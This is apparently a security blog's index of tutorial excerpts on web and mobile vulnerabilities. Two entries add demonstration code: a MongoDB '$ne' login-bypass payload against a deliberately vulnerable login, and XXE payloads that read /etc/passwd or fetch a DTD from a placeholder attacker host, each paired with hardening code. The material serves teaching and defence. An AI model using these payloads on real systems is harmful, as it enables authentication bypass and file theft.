General
Common web application attacks and quick steps to prevent them
Management needs to take ownership of security, especially the security of sensitive customer information. It is often only the most high-profile or sophisticated attacks that you actually hear about, but the reality is that there are any number ...
Top Mistakes when Performing a Web Vulnerability Assessment
Last year, according to statistics from the security vendor Secunia, over 15,500 vulnerabilities were detected in commercial software across 3,870 products. Unfortunately, many vulnerabilities remain open for weeks, or even years, as ...
Why Web Vulnerability Testing Should Be Automated
If you maintain a website or web application, or are simply a user of one, you probably want to know whether the sites you own or visit are actually secure. There are some great ...
Network Vulnerability Scanning
Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes. A vulnerability scan detects and classifies system weaknesses in computers, networks and communications equipment and ...
Web security issues you need to be concerned about
1. SQL Injection (SQLi) SQL injection is one of the most common web security issues companies face. In a SQL injection attack, the attacker supplies input that is interpreted as part of a SQL query, and uses it to read sensitive data from the database. These SQL ...
Common website vulnerabilities
These are some common website vulnerabilities found during a vulnerability scan. Developers need to plan to close these loopholes in order to eliminate the following common vulnerabilities. 1. SQL INJECTIONS SQL injection is a type of web ...
Why we need Web Testing for Web Applications?
In simple terms, web testing is checking your web application for potential bugs before it goes live, or before code is moved into the production environment. During this stage, issues such as web ...
How to Find Vulnerabilities in Website?
Finding web vulnerabilities and closing those security gaps proactively is an absolute must for today's businesses. But many organizations lack the tools and expertise to identify threats in their applications. To help your organization ...
What is a penetration testing tool and why is it important?
Penetration testing is the process of scanning and validating your web applications to find exploitable weaknesses in them. In other words, it answers a simple question: "What could a hacker do to harm my web application, or my organisation’s online ...
Why Web Application Testing is important?
In the modern digital world, simply going online can expose us to a number of harmful cyber threats. Nowadays we can do everything from grocery shopping to paying school bills and admissions online. If you manage a company or organization, your ...
Vulnerability Assessment Checklist
A vulnerability assessment is a process that identifies and assigns severity levels to security vulnerabilities in Web applications that a malicious actor can potentially exploit. The assessment is conducted manually and augmented by commercial or ...
How to improve Web Application Security
Web application security is one major element of web app development that often gets overlooked. It’s understandable. Business websites and applications need to be as accessible as possible while remaining robust, but this presents a huge range of security ...
OWASP Top Ten
The OWASP Top Ten is a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are. Project members include a variety of security experts ...
XVNA
XVNA (Extreme Vulnerable Node Application) is a deliberately vulnerable application that helps security enthusiasts learn application security and helps developers better understand the process of securing applications. It is totally legal to break into or hack this application. ...
XVNA Setup
Hey friends, this tutorial is about setting up the Extreme Vulnerable Node Application (XVNA) on your localhost. XVNA is available on GitHub at https://github.com/vegabird/xvna; you can download it and test it in your ...
OWASP Top 10 2017
Application Security Risks 2017. The OWASP Top Ten has been updated and the following is the new list: A1:2017 – Injection A2:2017 – Broken Authentication A3:2017 – Sensitive Data Exposure A4:2017 – XML External Entities (XXE) A5:2017 – Broken Access ...
OS Injection
Hi, this post is about OS command injection. Injection is only possible where attacker-controlled input reaches the command being built. In OS injection we first need to determine the operating system (OS) the server is running, because the payload varies between Windows and Linux. Here we are running on Windows. For ...
NoSql Injection
In this tutorial, we will see how to perform NoSQL (MongoDB) injection in the Extreme Vulnerable Node Application (XVNA). In normal SQL injection we have a few special characters that can be used to find the vulnerability, and NoSQL has its own equivalents (query operators such as $ne and $gt). Most of the ...
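The bypass the post refers to, as an added example that is not XVNA's own code: a login that drops a parsed JSON body straight into a MongoDB query lets the attacker replace the password string with an operator object such as `{"$ne": ""}`, which matches any document. The in-memory matcher below stands in for a real collection and models only the operators needed ($ne, $gt, $regex); the user records are constructed sample data, and the sanitizer follows the same idea as the express-mongo-sanitize package (reject keys starting with `$` or containing `.`) but is written here from scratch, not taken from that package.

```javascript
// Constructed sample data standing in for a MongoDB users collection.
const users = [
  { username: 'admin', password: 'S3cret!' },
  { username: 'bob',   password: 'hunter2' },
];

// Minimal model of MongoDB query-operator semantics, enough to show the bypass.
// A plain value is an equality match; an object is an operator match.
function valueMatches(actual, expected) {
  if (expected !== null && typeof expected === 'object' && !Array.isArray(expected)) {
    return Object.entries(expected).every(([op, arg]) => {
      switch (op) {
        case '$ne':    return actual !== arg;
        case '$gt':    return actual > arg;
        case '$regex': return new RegExp(arg).test(String(actual));
        default: throw new Error(`operator ${op} not modelled`);
      }
    });
  }
  return actual === expected;
}

function findOne(collection, query) {
  return collection.find(doc =>
    Object.entries(query).every(([field, expected]) => valueMatches(doc[field], expected))
  ) || null;
}

// Vulnerable pattern: body fields go straight into the query. With a JSON body
// parser, {"username":"admin","password":{"$ne":""}} arrives as an object, so
// the password clause becomes "password != ''" and matches the admin record.
function vulnerableLogin(body) {
  return findOne(users, { username: body.username, password: body.password });
}

// Hardening 1: walk the untrusted input and refuse any key that looks like an
// operator or a dotted path (assumed policy, modelled on express-mongo-sanitize).
function hasOperatorKeys(value) {
  if (value === null || typeof value !== 'object') return false;
  return Object.entries(value).some(([k, v]) =>
    k.startsWith('$') || k.includes('.') || hasOperatorKeys(v));
}

// Hardening 2: insist that credential fields are strings before they reach the
// query, so an object can never be interpreted as an operator.
function safeLogin(body) {
  if (hasOperatorKeys(body)) throw new Error('operator in untrusted input');
  if (typeof body.username !== 'string' || typeof body.password !== 'string') {
    throw new Error('credentials must be strings');
  }
  return findOne(users, { username: body.username, password: body.password });
}
```

Run `vulnerableLogin({ username: 'admin', password: { $ne: '' } })` and it returns the admin record without a password; `safeLogin` with the same body throws, while a correct string password still logs in. In a real deployment, bind the expected type at the boundary (a schema validator on `req.body`) rather than relying on ad hoc checks in every handler.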
Server Side JS Injection
Hi, in this tutorial we will see how server-side JS injection is performed in the Extreme Vulnerable Node Application. Since the application runs on Node.js, we know which built-in functions and globals can be used to ...
Sensitive Data Exposure
Hi, in this video we are going to see how to find sensitive data exposure in the Extreme Vulnerable Node Application (XVNA). This vulnerability can show up during any attack and in any module, wherever we see extra or sensitive data that a ...
Sensitive Data Header
Hi, in this part of the Extreme Vulnerable Node Application there is no input to supply. But we can easily see that the response headers expose which technologies we are using, so any user could identify the stack and find a matching exploit. So our ...
Broken Access Control
Hi, in this tutorial we will look at access control in the Extreme Vulnerable Node Application (XVNA). The aim is to break access control; in XVNA we found an IDOR (Insecure Direct Object Reference) vulnerability. This could be used ...
Cross Site Scripting
Hi, in this part of the Extreme Vulnerable Node Application (XVNA) we will see how XSS is executed. Since we are running on Express.js and AngularJS, there are only a few ways in AngularJS through which XSS can be executed. Let’s see how we ...
Security Misconfiguration
Hi, in this post we will see what security misconfiguration is and how it can be exploited. The security misconfiguration in the Extreme Vulnerable Node Application (XVNA) is the stack trace, which should not be shown to the user because it may ...
Command Injection
Hi, this post is about command injection. Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application ...
Broken Authentication
Hi, in this Extreme Vulnerable Node Application (XVNA) tutorial we show the Broken Authentication vulnerability, where we can access the application without any credentials and can also call its REST endpoints without authenticating. This ...
DOM XSS
Hi, in this part of Damn Vulnerable Web Application (DVWA) we will see how DOM XSS is executed. DOM-based XSS is a cross-site scripting vulnerability in which the payload is executed by client-side JavaScript that writes attacker-controlled data into the DOM (Document Object Model), rather than being reflected in the HTML returned by the server. ...
XML External Entity Injection
Hi, this post is about XML External Entity injection. An XML External Entity attack is a type of attack against an application that parses XML input. Attacks can include disclosing local files, which may contain sensitive data such as passwords ...
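The file-disclosure attack named above depends on the parser honouring a DOCTYPE with an external ENTITY declaration. The safest fix is to disable DTD processing in the parser; where a library offers no such switch, the added example below (not from the original post) gates the document before parsing by scanning the XML prolog for a DOCTYPE. Because entity declarations can only live inside a DOCTYPE, rejecting it also blocks parameter-entity and out-of-band variants. The payloads and the benign document are constructed; `attacker.example` is a placeholder host.

```javascript
// Constructed attacker payload: classic local-file disclosure via an external entity.
const XXE_PAYLOAD = `<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user><name>&xxe;</name></user>`;

// Constructed out-of-band variant: a parameter entity pulls a remote DTD
// (no entity is referenced in the body, so content-based checks miss it).
const OOB_PAYLOAD = `<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd; ]>
<data>x</data>`;

// Constructed benign inputs: no DTD, and a comment that merely mentions DOCTYPE.
const BENIGN = `<?xml version="1.0"?><user><name>alice</name></user>`;
const COMMENTED = `\uFEFF<!-- <!DOCTYPE x> --><user/>`;

// Walk the prolog: skip BOM, whitespace, the XML declaration / processing
// instructions and comments. The first other construct is either a DOCTYPE
// (reject) or the root element (accept). A DOCTYPE is only legal here, so
// scanning the body is unnecessary and would only create false positives.
function findDoctype(xml) {
  let i = 0;
  const n = xml.length;
  if (xml.charCodeAt(0) === 0xFEFF) i = 1;
  while (i < n) {
    if (/\s/.test(xml[i])) { i++; continue; }
    if (xml.startsWith('<?', i)) {
      const end = xml.indexOf('?>', i);
      if (end < 0) return { doctype: false, error: 'unterminated processing instruction' };
      i = end + 2; continue;
    }
    if (xml.startsWith('<!--', i)) {
      const end = xml.indexOf('-->', i);
      if (end < 0) return { doctype: false, error: 'unterminated comment' };
      i = end + 3; continue;
    }
    // Spec keyword is upper-case; compare case-insensitively to be conservative.
    if (xml.slice(i, i + 9).toUpperCase() === '<!DOCTYPE') return { doctype: true, offset: i };
    return { doctype: false, offset: i };
  }
  return { doctype: false, offset: n };
}

// Gate to call before handing untrusted XML to any parser.
function acceptXml(xml) {
  const r = findDoctype(xml);
  if (r.error) throw new Error('malformed XML prolog: ' + r.error);
  if (r.doctype) throw new Error(`DOCTYPE not allowed (offset ${r.offset})`);
  return xml;
}
```

Use `acceptXml` as the first step of any endpoint that parses XML; if the parser you use does expose a switch for external entities or DTD loading, turn it off as well rather than relying on the gate alone.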
Android Reverse Engineering
Hi, this post is about Android reverse engineering. Reverse engineering is taking apart an object to see how it works, in order to duplicate or enhance it. The practice, taken from older industries, is now frequently ...
XML Injection
In this post, we will look at XML injection. The form covered here is closely related to XPath injection, where we inject a payload into a query in much the same way as in SQL injection. We can test for it by submitting a single quote. If it ...
Sub Domain Takeover
Hi, in this tutorial we will see what subdomain takeover is and how it works. Subdomain takeover is considered high severity because it gives the attacker full control of the affected subdomain. The takeover is only possible if the subdomain ...
HTTP Parameter Pollution
HTTP Parameter Pollution (HPP) vulnerabilities allow attackers to exploit web applications by supplying duplicate parameters in the URL query string or request body; depending on how the server resolves the duplicates (first value, last value, or all values), this can lead to cross-site scripting, privilege escalation or authorization bypass. ...
Error Based SQL Injection
Hi, in this post we will learn about error-based SQL injection. There are three common types of SQL injection: union-based injection, error-based injection and blind SQL injection. To find SQL injection we generally use a single quote ('); using ...
Insecure Data Storage
Hi guys, today we are going to look at Insecure Data Storage from the OWASP Mobile Top 10. There are a few important storage types where these problems (vulnerabilities) show up. The types are as follows: SQL databases, log files, XML data ...
How to use Burp Suite with an Android mobile
Hi, this post is about how to use Burp Suite with an Android mobile. Step 1: Open Settings on your mobile and tap Wi-Fi. Step 2: Long-press your connected network (here TP-LICK_720C). Step 3: Tap Modify network. Step 4 ...
How to detect a RAT on Windows
Hi, this post is about how to detect a Remote Administration Tool (RAT), also known as a remote access trojan, on Windows. Antivirus software can detect some RATs, but many remain undetected by antivirus. In ...
How to work with Drozer (Penetration Testing Tool Mobile)
Hey everyone, in this post we will look at Drozer and how it can be used to pen-test Android applications. For that, we need the following: a mobile device or emulator (rooted preferred) with USB debugging enabled. The Drozer agent is needed ...
How to set up and use Mobile Security Framework (MobSF)
Hi, this post is about how to set up and use the Mobile Security Framework (MobSF). Requirements: Python 2.7, Oracle JDK 1.7 or above. After installing these, follow these steps. Step 1: Search for Mobile Security Framework and download the files. Step 2: ...
Insecure Deserialization – XVNA
Hi, this post is about how to find insecure deserialization in XVNA. Since many apps that accept serialized objects do not validate or check untrusted input before deserializing it, attackers can inject malicious objects into a data stream and ...
Web Application Vulnerability Scanner
Hello ladies and gentlemen, here we come with a new topic, `Web Application Vulnerabilities`, and how to scan for them using a tool. So without any delay, let’s get to the topic. What is a web application vulnerability? A vulnerability is a weakness which ...